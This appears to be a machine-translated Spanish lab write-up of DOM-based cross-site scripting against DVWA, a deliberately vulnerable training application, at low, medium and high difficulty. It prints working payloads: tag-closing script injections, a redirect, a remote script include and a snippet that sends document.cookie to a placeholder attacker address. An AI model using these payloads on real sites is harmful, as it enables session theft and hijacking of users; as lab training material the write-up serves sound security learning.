Ataque de scripting entre sitios XSS de DVWA (tipo DOM)
Tipo de objeto de texto DOM, activa xss modificando las etiquetas js (comprensión personal)
Tabla de contenido
clase baja
1. Ventana emergente
Insertar código malicioso:
Incrustar directamente:
Activado con éxito:
Verifique el código del front-end y descubra que el código js está insertado en el valor value:
Otra forma del
código js:
</option></select><img src='' onerror=alert('xss')>
Use </ option> </ select> para cerrar la etiqueta correspondiente, y luego inserte la ventana emergente del código js:
Ver el código de front-end:
2. Redirigir
Incrustar directamente:
<script>window.location = "http://www.baidu.com"</script>
Cierre la etiqueta frontal:
111</option></select><script>window.location = "http://www.baidu.com"</script>
3. Obtén la galleta
Use kali para monitorear:
inserte código malicioso y active xss:
<script src='http://xxxxx/a.js'></script>
Código de secuencia de comandos:
var img = new Image();
img.src='http://ip地址:端口/cookie.php?cookie='+document.cookie;
Obtenga la cookie con éxito:
Intermedio
Verifique el código fuente para ver qué es diferente del nivel bajo; encontré que la etiqueta <script> no se puede usar.
Puede elegir no usar esta etiqueta o usar #:
código de front-end:
encontrado que # separa el frente y la parte posterior para activar XSS.
Obtener cookies:
Nivel alto
Ver código fuente: verificación de lista blanca.
Utilice # para omitir:
ataque de scripts de sitios cruzados XSS de DVWA (tipo de almacenamiento) .
Ataque de scripts de sitios cruzados XSS de DVWA (tipo de reflexión) .